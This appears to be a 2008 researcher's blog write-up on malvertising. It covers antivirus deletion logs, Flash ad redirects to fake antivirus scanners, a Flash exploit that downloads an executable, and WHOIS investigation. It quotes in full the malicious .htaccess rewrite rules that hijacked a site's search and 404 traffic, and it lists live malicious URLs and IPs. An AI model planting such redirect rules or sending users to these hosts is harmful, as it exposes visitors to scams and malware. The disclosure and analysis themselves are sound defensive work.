Deleted: Heur.Trojan.Generic C:\Documents and Settings\KLY\Local Settings\Temp\12.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.snzz C:\Documents and Settings\KLY\Local Settings\Temp\13.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sphp C:\Documents and Settings\KLY\Local Settings\Temp\14.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sqak C:\Documents and Settings\KLY\Local Settings\Temp\15.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.snzy C:\Documents and Settings\KLY\Local Settings\Temp\16.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spcu C:\Documents and Settings\KLY\Local Settings\Temp\17.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spcp C:\Documents and Settings\KLY\Local Settings\Temp\18.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sqcs C:\Documents and Settings\KLY\Local Settings\Temp\1a.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sqcs C:\Documents and Settings\KLY\Local Settings\Temp\1d.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sqah C:\Documents and Settings\KLY\Local Settings\Temp\2.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.smnv C:\Documents and Settings\KLY\Local Settings\Temp\20.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spzz C:\Documents and Settings\KLY\Local Settings\Temp\21.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.snxy C:\Documents and Settings\KLY\Local Settings\Temp\22.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.shhw C:\Documents and Settings\KLY\Local Settings\Temp\23.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sowa C:\Documents and Settings\KLY\Local Settings\Temp\24.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sokj C:\Documents and Settings\KLY\Local Settings\Temp\26.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.snyb C:\Documents and Settings\KLY\Local Settings\Temp\28.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.snxy C:\Documents and Settings\KLY\Local Settings\Temp\29.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spix C:\Documents and Settings\KLY\Local Settings\Temp\3.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.snxy C:\Documents and Settings\KLY\Local Settings\Temp\30.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sqcs C:\Documents and Settings\KLY\Local Settings\Temp\31.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sqah C:\Documents and Settings\KLY\Local Settings\Temp\32.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spix C:\Documents and Settings\KLY\Local Settings\Temp\33.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sngv C:\Documents and Settings\KLY\Local Settings\Temp\34.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sngv C:\Documents and Settings\KLY\Local Settings\Temp\35.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.shig C:\Documents and Settings\KLY\Local Settings\Temp\36.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spmq C:\Documents and Settings\KLY\Local Settings\Temp\37.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sojh C:\Documents and Settings\KLY\Local Settings\Temp\38.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.awlz C:\Documents and Settings\KLY\Local Settings\Temp\39.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sngv C:\Documents and Settings\KLY\Local Settings\Temp\4.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sngv C:\Documents and Settings\KLY\Local Settings\Temp\5.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.shig C:\Documents and Settings\KLY\Local Settings\Temp\6.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spmq C:\Documents and Settings\KLY\Local Settings\Temp\7.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sojh C:\Documents and Settings\KLY\Local Settings\Temp\8.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.awlz C:\Documents and Settings\KLY\Local Settings\Temp\9.gif
Deleted: Trojan-Downloader.Win32.Agent.wxq C:\Documents and Settings\KLY\Local Settings\Temp\b.gif
Deleted: Trojan-Downloader.Win32.Small.aacq C:\Documents and Settings\KLY\Local Settings\Temp\c.gif
Deleted: Trojan-Dropper.Win32.Small.axv C:\Documents and Settings\KLY\Local Settings\Temp\d.gif
Deleted: Trojan.Win32.Agent.qnw C:\Documents and Settings\KLY\Local Settings\Temp\dump_wmimmc.sys
Deleted: Virus.Win32.Alman.b C:\WINDOWS\system32\drivers\IsDrv122.sys
Deleted: Trojan-Downloader.Win32.Small.zgf C:\sw.exe
Deleted: Trojan-GameThief.Win32.OnLineGames.sngv C:\Documents and Settings\KLY\Local Settings\Temp\40.gif
Deleted: Trojan-Downloader.Win32.Small.zgf C:\Program Files\Capture\logs\deleted_files\C:\sw.exe
Deleted: Trojan-Downloader.Win32.Agent.yuv C:\Program Files\Messenger\msgmr.dll
Deleted: Trojan-Downloader.Win32.Small.hlp C:\WINDOWS\AppPatch\AcSpecf.dll
Deleted: Trojan-Spy.Win32.FtpSend.b C:\WINDOWS\AppPatch\AcXtrnel.sdb
Deleted: Trojan-Downloader.Win32.Small.yvn C:\WINDOWS\Fonts\Framdee.ttf
Deleted: Trojan-Downloader.Win32.Agent.erl C:\WINDOWS\linkinfo.dll
Deleted: Trojan.Win32.Agent.xwr C:\WINDOWS\system32\baccops.dll
Deleted: Trojan.Win32.Agent.xzu C:\WINDOWS\system32\cmonos.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sjbb C:\WINDOWS\system32\crtnumo.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.spim C:\WINDOWS\system32\cxhole.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sogz C:\WINDOWS\system32\ddserh.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.bkke C:\WINDOWS\system32\dickus.dll
Deleted: Trojan-Spy.Win32.FtpSend.a C:\WINDOWS\system32\drivers\eth8023.sys
Deleted: Trojan-Spy.Win32.Agent.dhi C:\WINDOWS\system32\esceps.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.smxr C:\WINDOWS\system32\fmcvxy.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.spqo C:\WINDOWS\system32\hhrdxd.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.snoc C:\WINDOWS\system32\jhfrxz.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sncz C:\WINDOWS\system32\jolinos.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.soqc C:\WINDOWS\system32\keyiftp.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.bkgz C:\WINDOWS\system32\lenowos.dll
Deleted: Trojan-Spy.Win32.Agent.dpw C:\WINDOWS\system32\manleu.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.somn C:\WINDOWS\system32\mssetd.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sqcs C:\WINDOWS\system32\mssetdk.exe
Deleted: Trojan-GameThief.Win32.OnLineGames.sqei C:\WINDOWS\system32\offscrl.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sozc C:\WINDOWS\system32\rmbsony.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.snuq C:\WINDOWS\system32\sgdewg.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sphn C:\WINDOWS\system32\sunesn.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sohb C:\WINDOWS\system32\tdfhex.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sodi C:\WINDOWS\system32\therbrek.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.snnd C:\WINDOWS\system32\wdhotem.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sokr C:\WINDOWS\system32\wrqszl.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sogy C:\WINDOWS\system32\wzcfsw.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.spwo C:\WINDOWS\system32\xpsbos.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.soha C:\WINDOWS\system32\zgtwfx.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sodl C:\WINDOWS\system32\zlcdps.dll

Undetected atm.

• 08/13/2008 24,576 1.gif
• 08/13/2008 24,576 a.gif
• 08/13/2008 256,667 AcSpecf.sdb
• 08/04/2004 18,432 mshta.dll
• 08/13/2008 19,456 sysocmgr.dll
• 08/13/2008 45,056 ThunderAdvise.dll

Update

1gif - Trojan-Proxy.Win32.Agent.awt
a.gif - Trojan-Proxy.Win32.Agent.awt

<h4></h4>
Courtesy of Sandi.

cardstore.com.

Fuse Kit 2.1.4 has been used in this malvertizement. Just like Sandi I would advise extreme caution for any advertisement build with this kit. I have never encountered Fuse Kit in "legit" advertisements. More info.
The malvert was received from trackstarmedia.com. The domain has been suspended due to invalid Whois information. Full story.

<h4></h4>
I was reading some of the forum posts mentioning the use of the clipboard & malware URL's - which I experienced myself on isuisse btw - on Sandi's Blog when I ran into something way more frightening ...

From this comment.

Another person complains of the clipboard problem - you can see the discussion here:
http://forums.devnetwork.net/viewtopic.php...48&p=477521

The same person made another post here.

Ok guys, I'd love to hear thoughts on this one. I had a very strange thing happen to me today. I found out that my .htaccess file had been edited by _someone_ to have this in it:

CODE

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://87.248.180.88/in.html?s=hg_err

I'm not entirely sure what all of that means. However, I now know that all my 404s were getting redirected to 87.248.180.88 (which seems to be spam/virus-ey). I discovered this by almost pure chance. I've alerted my hosting provider, have changed all my passwords, and removed all the code that I could find. However, I'm _very_ curious as to how this got into my .htaccess file.

I would be _very_ surprised if someone had guessed my password since it's rather strong (8+ characters, capitalization thrown in and numbers/special chars).
I'm pretty sure that none of the php scripts on my server have access to this file, but I could be wrong (?).
Any ideas?

For those not familiar with .htaccess we will explain what those lines do.

1. If the header of your browser tells the website you're visiting that you come from Google, AOL, MSN, Altavista, Ask or Yahoo search engine you will be redirected to 87.248.180.88/in.html?s=hg.
2. If you request a page that doesn't exist on the website you will get redirected to 87.248.180.88/in.html?s=hg_err instead of the usual 404 not found.

Let's have a closer look at those URL's using a sniffer. In both cases we'll see a redirect to a fake online scanner.

87.248.180.88/in.html?s=hg

CODE

HTTP/1.1 302 Found
Date: Fri, 15 Aug 2008 18:04:16 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5 with Suhosin-Patch
X-Powered-By: PHP/5.2.5
Set-Cookie: visited=1
Location: http://scanner.antivir64.com/?aff=1050
Connection: close
Content-Type: text/html

Redirect.

scanner.antivir64.com/?aff=1050

______________________________

87.248.180.88/in.html?s=hg_err

CODE

HTTP/1.1 302 Found
Date: Fri, 15 Aug 2008 18:29:50 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5 with Suhosin-Patch
X-Powered-By: PHP/5.2.5
Set-Cookie: visited=1
Location: http://greatvideo3.com/soft.php?aid=0147&d=3&product=XPA
Connection: close
Content-Type: text/html

Redirect.

greatvideo3.com/soft.php?aid=0147&d=3&product=XPA
internet-defense2009.com/2009/1/freescan.php?aid=880147

<h4></h4>
A Google search on 87.248.180.88 reveals already 41 results.

Below are a few reports from that search.

http://support.mozilla.com/tiki-view_forum_thread.php?comments_parentId=115906&forumId=1
http://forums.digitalpoint.com/showthread.php?t=968388
http://www.webhostingtalk.com/showthread.php?p=5234158
http://www.talkweather.com/forums/index.php?s=&showtopic=48260&view=findpost&p=595288

It seems that many iPower websites are affected as hacking started back in 2007 on those servers. Talkweather.com is hosted on ThePlanet and so is www.HuxleyGame.com (ns on hostgator.com).

IP details to follow in a few ...

<h4></h4>
87.248.180.88

*.sex2porn.com A
87-248-180-88.starnet.md PTR
bestrezult.com A
mail.xuixui.net A
xerxer.net A

Most are regged by DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM

IP Location: Moldova, Republic Of Chisinau Sc Starnet Srl

inetnum: 87.248.176.0 - 87.248.191.255
netname: STARNETMD
descr: SC STARNET SRL
descr: Chisinau, Moldova
country: MD
admin-c: SA4929-RIPE
tech-c: SA4929-RIPE
status: ASSIGNED PA
remarks: INFRA-AW
remarks: Leased for Users
mnt-by: MNT-STARNETMD
source: RIPE # Filtered

role: StarNet Administrator
remarks:
address: SC "STARNET" SRL
address: 55, Maria Cibotari str.
address: MD2012 Chisinau
address: Moldova, Republic of
remarks:
phone: +373 (22) 844444
fax-no: +373 (22) 844445
remarks:
remarks: ----------------------------------------------
remarks: SC STARNET SRL
remarks: ISP in Republic of Moldova
remarks:
remarks: General questions:
remarks: Routing and Technical questions:
remarks: Last Update: 27.06.2008 ()
remarks: ----------------------------------------------
remarks:
remarks:
e-mail:
remarks:
admin-c: OB1145-RIPE
tech-c: OB1145-RIPE
admin-c: DG3460-RIPE
tech-c: DG3460-RIPE
admin-c: VF1333-RIPE
tech-c: VF1333-RIPE
nic-hdl: SA4929-RIPE
mnt-by: MNT-STARNETMD
source: RIPE # Filtered

route: 87.248.180.0/24
descr: StarNet SRL
descr: Chisinau, Moldova.
origin: AS31252
mnt-by: MNT-STARNETMD
source: RIPE # Filtered

route: 87.248.176.0/20
descr: SC STARNET SRL
descr: Chisinau, Moldova
origin: AS31252
mnt-by: MNT-STARNETMD
source: RIPE # Filtered

route: 87.248.160.0/19
descr: SC STARNET SRL
descr: Chisinau, Moldova
origin: AS31252
mnt-by: MNT-STARNETMD
source: RIPE # Filtered

route: 87.248.176.0/21
descr: StarNet SRL
descr: Chisinau, Moldova.
origin: AS31252
mnt-by: MNT-STARNETMD
source: RIPE # Filtered
______________________________

scanner.antivir64.com - 78.157.142.7 - 91.203.92.64

Website Title: Antivir64
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-08-08
Expires: 2009-08-08
Updated: 2008-08-09
Registrar Status: clientTransferProhibited
Name Server: MANAGEDNS1.ESTBOXES.COM (has 7,805 domains)
Name Server: MANAGEDNS2.ESTBOXES.COM
Name Server: MANAGEDNS3.ESTBOXES.COM
Name Server: MANAGEDNS4.ESTBOXES.COM
Whois Server: whois.estdomains.com

Whois Record
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217

Domain Name: ANTIVIR64.COM

Registrant:
Sawert Alliance ltd.
Peltonen Martti ()
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Creation Date: 08-Aug-2008
Expiration Date: 08-Aug-2009

Domain servers in listed order:
managedns4.estboxes.com
managedns3.estboxes.com
managedns2.estboxes.com
managedns1.estboxes.com

Administrative Contact:
Sawert Alliance ltd.
Peltonen Martti ()
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Technical Contact:
Sawert Alliance ltd.
Peltonen Martti ()
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Billing Contact:
Sawert Alliance ltd.
Peltonen Martti ()
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

hostnames sharing ip with a-records

• *.antivir64.com
• antivir64.com
• antivirus-2008a-pro.com
• antivirus-2008y-pro.com

______________________________

greatvideo3.com - internet-defense2009.com - 84.16.252.73

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-08-12
Expires: 2009-08-12
Updated: 2008-08-12
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 754 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Berlin - Berlin - Netdirekt E.k
Dedicated Hosting: greatvideo3.com is hosted on a dedicated server.

Whois Record
Domain Name: GREATVIDEO3.COM

Creation Date: 12-Aug-2008
Expiration Date: 12-Aug-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

hostnames sharing ip with a-records

• 3gigabytes.com
• 84-16-252-73.internetserviceteam.com
• internet-defense2009.com
• mail.antispyguard-scanner.com
• mail.onlinexpsecurity.com
• myfreespace3.com
• updatesantivirus.com
• windows-defense.com

______________________________

<h4></h4>
A new malvertizement is being displayed on www.newsweek.com featuring www.easy-forex.com. Again the malvertizement has been created with Fuse Kit 2.1.4.

Screenshot in situ.

Banner.

media.washingtonpost.com/wp-adv/advertisers/trackstar/easyforex_728x90.swf

Campaign.

adoptserver.info/state_.gif?url=[removed]

At the time of the write-up the full redirect was inactive.
______________________________

Let's have a closer look at the URL

media.washingtonpost.com/wp-adv/advertisers/trackstar/easyforex_728x90.swf

We notice the presence of trackstar. I think we may link this to trackstarmedia which has been caught a couple of days ago for distributing the cardstore.com malvertizement. References here and here.

The malicious banner being hosted at the Washingtonpost, I would advice extreme caution when visting washingtonpost.com and any website serving media content from them. The discovery of this malvertizement confirms the report from 14th August 2008 seen in Clipboard Loop - repeated copies from browser - virus?

It just happened again, this time on my XP laptop.
While on MSNBC.com frontpage, I clicked on a link to a newsweek article about Obama's comments on tire pressure. Bam! Next thing I know, I'm at a malware site: hxxp://webscannerfreever.com (don't go there!!!!!) and it's claiming to have found all sorts of malware on my PC, and keeps trying to initiate a download. I must have cancelled the thing 20 times before I could get my browser to go back (click the back button). Then I landed on the Newsweek page, which must have flashed by. ......

Note: Bold & color emphasis are mine.

The "clipboard issue" is also mentioned in that article. I can confirm that some of those websites copy their link to the clipboard like I did experience myself on 13th July 2008 with a banner hosted on ifrance. Reported here. There is no need to reboot the computer or log off ... just follow the instructions below.

1. Close the tabs with the advertisement, redirect ... or even better, close your browser.
2. Click Start > Run
3. In the edit box type clipbrd followed by enter.
4. The actual content of the clipboard will be displayed.
   
5. Click the delete button and confirm by Yes.

<h4></h4>
adtds.trackads.net / adtds2.promoplexer.com new redirecting domains ...

superupload2.com

superupload2.com/soft.php?aid=0593&d=3&product=XPA

Jump to

internet-scanner2009.com/2009/1/_freescan.php?aid=880593

mytube4.com

mytube4.com/soft.php?aid=011807&d=2&product=XPA

Jump to

internetscanner2009.com/2009/1/freescan.php?aid=77011807

<h4></h4>
superupload2.com - 84.16.227.62

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-08-12
Expires: 2009-08-12
Updated: 2008-08-12
Name Server: NS1.MYNICK.NAME (has 756 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Berlin - Berlin - Netdirekt E.k
Dedicated Hosting: superupload2.com is hosted on a dedicated server.

Domain Name: SUPERUPLOAD2.COM

Creation Date: 12-Aug-2008
Expiration Date: 12-Aug-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

hostnames sharing ip with a-records

• bestpictures2.com
• globala2.com
• internet-scanner2009.com
• windows-scanner.com
• www.jupanu.ro

______________________________

mytube4.com - 58.65.238.106

Website Title: None given.
ICANN Registrar: BIZCN.COM, INC.
Created: 2008-07-30
Expires: 2009-07-30
Updated: 2008-07-31
Registrar Status: clientDeleteProhibited
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 756 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.bizcn.com

IP Location - Hong Kong - Hostfresh

Whois Record
Domain name: mytube4.com

Registrant Contact:
DomainsReg, Inc.
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn

Administrative Contact:
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn

Technical Contact:
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn

Billing Contact:
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn

DNS:
ns1.mynick.name
ns2.mynick.name
ns3.mynick.name
ns4.mynick.name

Created: 2008-07-30
Expires: 2009-07-30

hostnames sharing ip with a-records

• antispyguard-scanner.com
• browsersecuritycenter.com
• fastupdateserver.com
• microsoft.browserprotectioncenter.com
• online-xpcleaner.com
• webscweb-scannerfree.com
• xpantivirussecurity.com

______________________________

internet-scanner2009.com - 84.16.227.62

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-08-12
Expires: 2009-08-12
Updated: 2008-08-12
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 756 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Berlin - Berlin - Netdirekt E.k

Domain Name: INTERNET-SCANNER2009.COM
Creation Date: 12-Aug-2008
Expiration Date: 12-Aug-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

hostnames sharing ip with a-records

• bestpictures2.com
• globala2.com
• windows-scanner.com
• www.jupanu.ro

______________________________

internetscanner2009.com - 89.149.229.168

Website Title: None given.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-08-15
Expires: 2009-08-15
Updated: 2008-08-15
Name Server: MANAGEDNS1.ESTBOXES.COM (has 7,809 domains)
Name Server: MANAGEDNS2.ESTBOXES.COM
Name Server: MANAGEDNS3.ESTBOXES.COM
Name Server: MANAGEDNS4.ESTBOXES.COM
Whois Server: whois.estdomains.com

IP Location - Berlin - Berlin - Netdirekt E.k

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: INTERNETSCANNER2009.COM

Registrant:
Protect Details, Inc
Domain Manager ()
29 Kompozitorov st.
Saint Petersburg
,194358
RU
Tel. +7.8129342271

hostnames sharing ip with a-records

• 89-149-229-168.internetserviceteam.com
• ns2.persfeed.com
• ns2.proupver.net

..:: All Your IP ® Are Belong To Me - It's a good day to fry ::..

<h4></h4>
Lot's of people have been reporting redirects lately as seen on Sandi's blog. Let me quote a sentence of the latest blog entry.

It worries me that I am seeing complaints about malvertizing-like symptoms all over the net implicating - not only newsweek, but at other big name sites like MSNBC, Facebook, lime.com, Hotmail, MySpace and Yahoo.

It worries me too and I have been poking around at different sites without any success until another idea, supposition, theory (call it whatever you want) crossed my mind when looking at some content displayed at MSNBC.On different places, from time to time there's an external link to ... newsweek.com

On today.msnbc ...

There is also a small box with Top msnbc.com stories.

When clicking on the article I ended up at newsweek and the malicious easy-forex banner was there again.

If you are completely redirected and not familiar with them, you *might* eventually think that the malvertizement was located on msnbc.com no? When you are interested by an article, you don't always hover over the link and watch the status bar before clicking on it either, so you never will see the Newsweek site either or it will just "flash by". Let's go a step further now. On newsweek.com you can add an article to Social Networks such as Digg It, Newsvine, Del.icio.us, Facebook, Yahoo Buzz, Mypace.

Let's fly over to Digg It. A search reveals quite some links to Newsweek articles. I clicked on 1 link and yeah, did hit that easy-forex malvert again. Again, if fully redirected you won't see Newsweek and Digg It will be the "culprit".

Note I used open in new window from my browser as I was expecting this to happen (well 90% of chance).

My Yahoo allows content from msnbc.com to be added. The module is called Top MSNBC Headlines. Yet another possible link in addition to Yahoo Buzz ...

At MySpace a search for newsweek articles reveals 1180 results ...

See where I'm trying to get? One "well placed" malvertizement may lead to a huge number of affected users and the fact that the malvertizement is often displayed upon entering the website may lead to think that you got hit "elsewhere". Of course there might be more malicious banners around, I don't exclude that possibility at all. It's not the first time we saw them hit several big sites at the same time. This theory doesn't explain lime.com or hotmail for example.

<h4></h4>
I suppose most of you are familiar with In-text advertising, which is a form of contextual advertising. IntelliTXT and Kontera are such providers. You're never gonna believe it, they show up there too now. Hovering over Fujitsu did bring up an advertisement for a fake online scanner called winspywarescanner.com

Below is the association of the word Fujitsu to it's advertising content on the kontera server.

If you accidentally click on it, we will follow the redirects below and end up at the fake scanner.

c.enhance.com/c?e1=[removed]
c.enhance.com/c/2?e1=[removed]
scan.free-antispyware-scanner.com/110029/3/

Some of those In-text advertising ads are Flash files ... I let you readers imagine the rest.

<h4></h4>
The recent malvertizement featuring easy-forex has lead to quite some attention around Fuse Kit.

• Hold fire on Fuse Kit....
• Unintended consequences and Fuse Kit
• Clarification: Fuse Kit is not the source of malware

From Moses's comment.

I hope that you, Kimberly and the others will retract these implications that Fuse is somehow responsible for things it is not even capable of.

Let's get things straight. The bad guys are writing their own procedures in Fuse code that is a fact and I've written to Moses about that. It does NOT mean that Fuse is bad, it's being "MISUSED" just like they use Action Script 2.0 & 3.0 to obfuscate data.

Sandy did partially illustrate this here, I can as well disclose the rest.

Right side the malvert, left side a clean easy-forex advertisement (from bannersonline).

Text Fields.

We also notice the presence of 4 Misc Tags in the bad advertisment, they are Fuse exports assets.

Scripts.

Text 4 in the SWF file is used to hold an obfuscated string.

Text 4 is named "id".

Below is the declaration of vars used in the altered Fuse.as. We notice:

1. a reference to "id" which is our text 4 string.
2. _nsFunc = "split" - We know that they use "split" to break long strings into parts.
3. _nJid = ",la," - The identificator used to break the string in parts

Below is a snipit of the code which allows to decrypt and build the URL's and the use of split & join.

When I first saw the scrambled text, I initially did think it was XORed but that isn't the case. The "bad guys" did write a complex set of functions to decode the "obfuscated" text. In no means these are part of the initial Fuse package / library. They have added their own code to the Fuse library, disguised as animation functionality in order to make people think it is part of Fuse which is NOT the case. Fuse is not capable of any sort of encryption, decryption or network activity.

<h4></h4>
A MediaMan malvertizement has been discovered on Mashable.com and Google Adsense is implicated - Reference.
I did issue a warning about that possibility on April 18 2008 after reading an incident involving TheMishMash.com - Reference.

<h4></h4>
On Aug 18 2008, I noticed an in-text advertising for winspywarescanner.com and I said:

Some of those In-text advertising ads are Flash files ... I let you readers imagine the rest.

Well here is one, featuring Tubes. Seeing the campaign, it's not a recent one but at least it proves that you can encounter those malicious banners with in-text advertising. The text associated with such an advertisement is identified by a double-underline to differentiate it from regular hyperlinks. An in-page window containing advertising content appears when the cursor is positioned over the corresponding text. Below is an example that illustrates the concept.

______________________________

Banner.

images.kontera.com/[removed]/14_58_20_2914263.swf

Campaign.

mysurvey4u.com/crossdomain.xml
mysurvey4u.com/stats.php?campaign=f1owvast&u=1219640516279

<h4></h4>
File.

bannersrotator.com/fx22010/start/tunnel28.swf

Link inside.

92.62.101.13/i1.exe

Visible signs.

O4 - HKCU\..\Run: [A00FD6648.exe] C:\DOCUME~1\KLY\LOCALS~1\Temp\_A00FD6648.exe
O20 - Winlogon Notify: __c00ED7D6 - C:\WINDOWS\system32\__c00ED7D6.dat

<h4></h4>
Filename: tunnel28.swf

File size: 1351 bytes
MD5...: 302093a28197f6eb49fc73dbb4a278f9
SHA1..: 034caeb20d248c96c6bf92668dedf5b03f5c7e5e
SHA256: cb539426eefa4d5b1448992b7fb8a6bde7f1b9b457fb85f403851e18cb3a87c0
PEiD..: -
packers (Kaspersky): Swf2Swc

QUOTE

File tunnel28.swf received on 09.02.2008 18:07:03 (CET)
AhnLab-V3 2008.9.3.0 2008.09.02 -
AntiVir 7.8.1.23 2008.09.02 EXP/Flash.Gen
Authentium 5.1.0.4 2008.09.02 -
Avast 4.8.1195.0 2008.09.02 SWF:CVE-2007-0071
AVG 8.0.0.161 2008.09.02 -
BitDefender 7.2 2008.09.02 -
CAT-QuickHeal 9.50 2008.09.02 SWF.Exploit
ClamAV 0.93.1 2008.09.02 -
DrWeb 4.44.0.09170 2008.09.02 -
eSafe 7.0.17.0 2008.09.02 -
eTrust-Vet 31.6.6064 2008.09.02 -
Ewido 4.0 2008.09.02 -
F-Prot 4.4.4.56 2008.09.02 -
F-Secure 8.0.14332.0 2008.09.02 -
Fortinet 3.14.0.0 2008.09.02 -
GData 19 2008.09.02 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.09.02 -
K7AntiVirus 7.10.437 2008.09.02 -
Kaspersky 7.0.0.125 2008.09.02 -
McAfee 5374 2008.09.01 -
Microsoft 1.3807 2008.09.02 Exploit:Win32/APSB08-11.gen!A
NOD32v2 3407 2008.09.02 SWF/Exploit.CVE-2007-0071
Norman 5.80.02 2008.09.02 -
Panda 9.0.0.4 2008.09.02 -
PCTools 4.4.2.0 2008.09.02 -
Prevx1 V2 2008.09.02 -
Rising 20.60.11.00 2008.09.02 Hack.Exploit.Swf.a
